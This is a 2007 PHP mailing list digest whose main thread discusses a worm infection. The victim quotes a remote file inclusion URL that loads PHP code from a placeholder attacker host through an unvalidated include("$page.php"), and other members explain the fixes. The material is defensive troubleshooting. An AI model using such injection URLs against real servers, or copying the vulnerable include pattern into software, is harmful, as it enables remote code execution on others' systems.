php-windows Digest 3 Mar 2007 13:03:03 -0000 Issue 3153
Topics (messages 27534 through 27539):
Re: php_http
27534 by: datsclark
Re: [PHP-DB] Fw: cara php&asp bisa jalan bareng|how to make asp & php work
together
27535 by: Bastien Koert
Re: Question on virus/worms
27536 by: Seak, Teng-Fong
27537 by: Bill Bolte
Re: [PHP] Re: Question on virus/worms
27538 by: Stut
27539 by: Tim
Administrivia:
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
[email protected]
----------------------------------------------------------------------
--- Begin Message ---
Yeah, they are installed. I was under the impression they are all on by
default in 5.2. phpinfo() shows them all as modules
"Niel Archer" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> Hi
> have you also made sure the required extensions (hash, iconv, SPL) are
> also installed
>
>
> Niel
--- End Message ---
--- Begin Message ---
1. install php, we have both running on our iis servers with no problems
2. you can use either one iis or apache ( my work machine runs several
servers at once) The trick will be to designate the ports that the servers
listen on
bastien
From: "bedul" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
CC: <[email protected]>,<[email protected]>
Subject: [PHP-DB] Fw: cara php&asp bisa jalan bareng|how to make asp & php
work together
Date: Fri, 2 Mar 2007 17:17:11 +0700
----- Original Message -----
From: "gunawan" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: <[email protected]>; <[email protected]>
Sent: Friday, March 02, 2007 5:10 PM
Subject: cara php&asp bisa jalan bareng|how to make asp & php work together
> wa kirim ke site english jd harap maklum kl pake bahasa inggris
>
> i have problem to solve.
> my office have only limited budget and only able buy one server and it
only
> asp inside.. the problem is, I want to make that server work for php and
for
> asp which that was already inside (since my office using some aplication
> using asp).
>
> 1.how to make the server able to respon both asp and php.. even thought
i
> will not touch the asp??
> 2. is better i use apache or iis??
>
> thx for your reply
>
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
_________________________________________________________________
Free Alerts : Be smart - let your information find you !
http://alerts.live.com/Alerts/Default.aspx
--- End Message ---
--- Begin Message ---
Robert Cummings wrote:
> Did you bother to google any of them? I just punched PHP/BackDoor.gen
> into Google and got a wealth of information.
Yes, of course! But what I can see there aren't far from useless
(cf what I write below).
Stut wrote:
> Seak, Teng-Fong wrote:
>> PHP/Chaploit
> http://vil.nai.com/vil/content/v_129568.htm
>
> [snipped]
I know these already. The server is using McAfee. So I'm quite
familiar with VIL of McAfee. But informations given by these pages
aren't enough to let me know what to do and how those virus/worms got to
get inside.
>> Do they mean anything to anyone of you? Do you know how they've got
>> inside the computer? Is there anything to do to prevent that? Are they
>> known PHP virus/worms to PHP community?
> Most likely means of them getting onto your machine is poorly written
> scripts, over-reliance on scripts downloaded from the web and poor
> server security.
>
> Hope that helps.
No, not really :-(
But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.
Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?
And the some-worm-file.txt file contains some PHP code, while my
index.php contains this instruction:
include("$page.php");
This is enough to make infiltration possible! IMO, this instruction
is supposed to be used like this, isn't it? So this is obviously a PHP
security loophole and I don't see how the "poorly written scripts" can
help anything unless a totally rewrite! And there's no "poor server
security" that I can see.
I've installed PHP5 and the problem seems fixed. However, PHP
writes out where the problem occurs! Indeed, the hacker could read a
line like this:
Warning: include() [function.include]: URL file-access is disabled in
the server configuration in
C:\Inetpub\wwwroot\index.php on line X
I don't want them (the hackers) to be able to read this either.
That gives too much information about my server's file system. How can
I stop that?
By the way, I know there're still a lot of servers out there still
using PHP4. Is this vulnerability a known bug? At least, I'm not aware
of that before!
Regards,
Seak
----------
* Zoner PhotoStudio 8 - Your Photos perfect, shared, organised!
www.zoner.com/zps
You can download your free version.
--- End Message ---
--- Begin Message ---
Turn off all error reporting (in php.ini) so that the error isn't pushed
to the screen.
-----Original Message-----
From: Seak, Teng-Fong [mailto:[EMAIL PROTECTED]
Sent: Friday, March 02, 2007 12:16 PM
To: [email protected]; [email protected]
Subject: [PHP-WIN] Re: Question on virus/worms
Robert Cummings wrote:
> Did you bother to google any of them? I just punched PHP/BackDoor.gen
> into Google and got a wealth of information.
Yes, of course! But what I can see there aren't far from useless
(cf what I write below).
Stut wrote:
> Seak, Teng-Fong wrote:
>> PHP/Chaploit
> http://vil.nai.com/vil/content/v_129568.htm
>
> [snipped]
I know these already. The server is using McAfee. So I'm quite
familiar with VIL of McAfee. But informations given by these pages
aren't enough to let me know what to do and how those virus/worms got to
get inside.
>> Do they mean anything to anyone of you? Do you know how they've
>> got inside the computer? Is there anything to do to prevent that?
>> Are they known PHP virus/worms to PHP community?
> Most likely means of them getting onto your machine is poorly written
> scripts, over-reliance on scripts downloaded from the web and poor
> server security.
>
> Hope that helps.
No, not really :-(
But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.
Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-f
ile.txt?
And the some-worm-file.txt file contains some PHP code, while my
index.php contains this instruction:
include("$page.php");
This is enough to make infiltration possible! IMO, this instruction
is supposed to be used like this, isn't it? So this is obviously a PHP
security loophole and I don't see how the "poorly written scripts" can
help anything unless a totally rewrite! And there's no "poor server
security" that I can see.
I've installed PHP5 and the problem seems fixed. However, PHP
writes out where the problem occurs! Indeed, the hacker could read a
line like this:
Warning: include() [function.include]: URL file-access is disabled in
the server configuration in C:\Inetpub\wwwroot\index.php on line X
I don't want them (the hackers) to be able to read this either.
That gives too much information about my server's file system. How can
I stop that?
By the way, I know there're still a lot of servers out there still
using PHP4. Is this vulnerability a known bug? At least, I'm not aware
of that before!
Regards,
Seak
----------
* Zoner PhotoStudio 8 - Your Photos perfect, shared, organised!
www.zoner.com/zps
You can download your free version.
--
PHP Windows Mailing List (http://www.php.net/) To unsubscribe, visit:
http://www.php.net/unsub.php
--- End Message ---
--- Begin Message ---
Seak, Teng-Fong wrote:
But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.
Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?
And the some-worm-file.txt file contains some PHP code, while my
index.php contains this instruction:
include("$page.php");
This is enough to make infiltration possible! IMO, this instruction
is supposed to be used like this, isn't it? So this is obviously a PHP
security loophole and I don't see how the "poorly written scripts" can
help anything unless a totally rewrite! And there's no "poor server
security" that I can see.
You mean to say that you're not validating what you're getting from the
user? Frankly you deserve everything you get. This is *not* a "security
loophole", it *is* a poorly written script.
I've installed PHP5 and the problem seems fixed. However, PHP
writes out where the problem occurs! Indeed, the hacker could read a
line like this:
Warning: include() [function.include]: URL file-access is disabled in
the server configuration in
C:\Inetpub\wwwroot\index.php on line X
I don't want them (the hackers) to be able to read this either.
That gives too much information about my server's file system. How can
I stop that?
Read the manual, specifically the error_reporting part. You can turn the
display of these messages off.
By the way, I know there're still a lot of servers out there still
using PHP4. Is this vulnerability a known bug? At least, I'm not aware
of that before!
It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+)
introduces the ability to turn off the ability to prevent this issue,
but it's still badly written code. Stop blaming the tool, start blaming
the mirror image and start learning how to code defensively.
-Stut
--- End Message ---
--- Begin Message ---
> -----Message d'origine-----
> De : Stut [mailto:[EMAIL PROTECTED]
> Envoyé : vendredi 2 mars 2007 20:23
> À : Seak, Teng-Fong
> Cc : [email protected]; [email protected]
> Objet : Re: [PHP] Re: Question on virus/worms
>
> Seak, Teng-Fong wrote:
> > But after I've spent some time reading the log files,
> I've finally
> > found out how the hackers managed to achieve worm infiltration.
> >
> > Actually, they're using an URL like this:
> >
> http://my-domain.com/index.php?page=http://hacker-domain.com/s
> ome-worm-file.txt?
*smirk*
> >
> > And the some-worm-file.txt file contains some PHP code,
> while my
> > index.php contains this instruction:
> > include("$page.php");
This one line brings up two known php coding security issues, learn about
them on http://phpsec.org
> >
> > This is enough to make infiltration possible! IMO, this
> > instruction is supposed to be used like this, isn't it?
NO it is not! See above..
> >So this is
> > obviously a PHP security loophole
YES! Learn about register_globals, allow_url_fopen, include()
Infact go learn PHP before blindly running scripts in a production
environment! Or if you really don't want too learn php at least subscribe to
bugtraq mailing list and go through the archive to see if the script you
want to run has a security history, see if they follow up on the issues or
just "ignore" the issues, and keep informed to see if any new issues have
been brought to hand.
> >and I don't see how the "poorly
> > written scripts" can help anything unless a totally rewrite!
Not neccassarily a total rewrite, try implementing some functions to
retrieve/filtre your $_GET $_POST data, turn off register_globals, replace
all variables relying on register globals with your newly implemented
functions.. Use regular expressions to find the data that needs to be
changed in your scripts..
> > And
> > there's no "poor server security" that I can see.
I think its time for you to take a pause on installing these scripts you are
downloading and read up on the php.ini configuration file, also do a search
on php history and security. Follow the changes in different php versions
aswell their are a lot of hints as to what "default" values have changed to
improve chances of "poorly written scripts" not being vulnerable. BUT unless
you understnad the issues involved these default values are a false excuse
for thinking your scripts is "secure". (ie upgrading to php5: you did it, it
solved your problem, but you still don't know why because you don't know
what value was changed in your php configuration)
Those few steps will definately be able to give you an idea of what kind of
security issues exist, eventually how they are circumvented, and ideas on
how you can improve your existing scripts to avoid these issues.
Once you are comfortable with this, before you use a script downloaded from
the inet in a production environment, go through the code and make sure you
don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't
related to the scripts original use). Also a good thing to look out for is
scripts that run with register_globals = off in the php.ini this at least
ensures "forced" good practice in coding (this does not mean one cannot code
well with register_globals = on, it just releaves a potential security issue
for the programmer and force him to call url passed variable in a proper
manner ie: using PHP Super Globals, to be able to use them)
>
> > I've installed PHP5 and the problem seems fixed. However, PHP
> > writes out where the problem occurs! Indeed, the hacker
> could read a
> > line like this:
> > Warning: include() [function.include]: URL file-access is
> disabled in
> > the server configuration in C:\Inetpub\wwwroot\index.php on line X
> >
> > I don't want them (the hackers) to be able to read this either.
> > That gives too much information about my server's file system. How
> > can I stop that?
Once again learn about php.ini and how it works (re: Stut mentioned -
error_reporting).
> > By the way, I know there're still a lot of servers out
> there still
> > using PHP4. Is this vulnerability a known bug? At least, I'm not
> > aware of that before!
>
> It's not a bug. It will never be a bug. Yes PHP5 (I believe
> it's 5.2+) introduces the ability to turn off the ability to
> prevent this issue, but it's still badly written code. Stop
> blaming the tool, start blaming the mirror image and start
> learning how to code defensively.
Can't agree more..
Don't "think" youre secure and live with it, someday it will bite you when
you least expect it.. Make it a part of your everyday work to constantly
reduce the risk of unwanted "intrusions"..
Regards,
Tim
--- End Message ---
